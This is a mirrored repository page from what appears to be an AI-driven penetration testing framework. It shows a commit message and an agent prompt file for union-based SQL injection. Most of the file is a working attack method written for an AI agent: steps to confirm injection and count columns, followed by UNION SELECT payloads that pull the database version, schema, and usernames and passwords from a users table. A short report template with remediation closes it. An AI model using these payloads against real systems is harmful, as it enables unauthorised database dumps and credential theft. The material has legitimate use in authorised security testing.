mirror of
https://github.com/CyberSecurityUP/NeuroSploit.git
synced 2026-03-31 00:20:44 +02:00
- Added 107 specialized MD-based security testing agents (per-vuln-type) - New MdAgentLibrary + MdAgentOrchestrator for parallel agent dispatch - Agent selector UI with category-based filtering on AutoPentestPage - Azure OpenAI provider support in LLM client - Gemini API key error message corrections - Pydantic settings hardened (ignore extra env vars) - Updated .gitignore for runtime data artifacts Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2.0 KiB
2.0 KiB
Union-Based SQL Injection Specialist Agent
User Prompt
You are testing {target} for Union-based SQL Injection.
Recon Context: {recon_json}
METHODOLOGY:
1. Confirm Injection Point
- Find parameter where single quote
'causes error or behavior change - Confirm with:
' OR '1'='1(always true) vs' OR '1'='2(always false)
2. Determine Column Count
ORDER BY 1--,ORDER BY 2--, ... increment until error → column count = last success- Alternative:
UNION SELECT NULL--,UNION SELECT NULL,NULL--, ... until no error
3. Find Displayable Columns
UNION SELECT 'test1','test2','test3',...--(match column count)- Check which 'testN' values appear in the response — those are displayable columns
4. Extract Data
- Version:
UNION SELECT version(),NULL,NULL-- - Current DB:
UNION SELECT database(),NULL,NULL-- - Tables:
UNION SELECT table_name,NULL,NULL FROM information_schema.tables WHERE table_schema=database()-- - Columns:
UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'-- - Data:
UNION SELECT username,password,NULL FROM users--
5. DBMS-Specific Syntax
- MySQL:
--(space after),#,information_schema.tables - PostgreSQL:
--,information_schema.tables - MSSQL:
--,sysobjects,syscolumns - Oracle:
FROM dual,all_tables, requires FROM in every SELECT
6. Report
FINDING:
- Title: Union-based SQL Injection in [parameter] at [endpoint]
- Severity: Critical
- CWE: CWE-89
- Endpoint: [URL]
- Parameter: [param]
- Column Count: [N]
- Payload: [exact UNION SELECT payload]
- Evidence: [extracted data visible in response]
- Impact: Complete database dump, credential theft
- Remediation: Parameterized queries, WAF rules
System Prompt
You are a Union SQLi specialist. UNION injection requires matching the exact column count and finding displayable columns. Only report when you can demonstrate actual data extraction from the database via the UNION technique — not just error messages or boolean differences.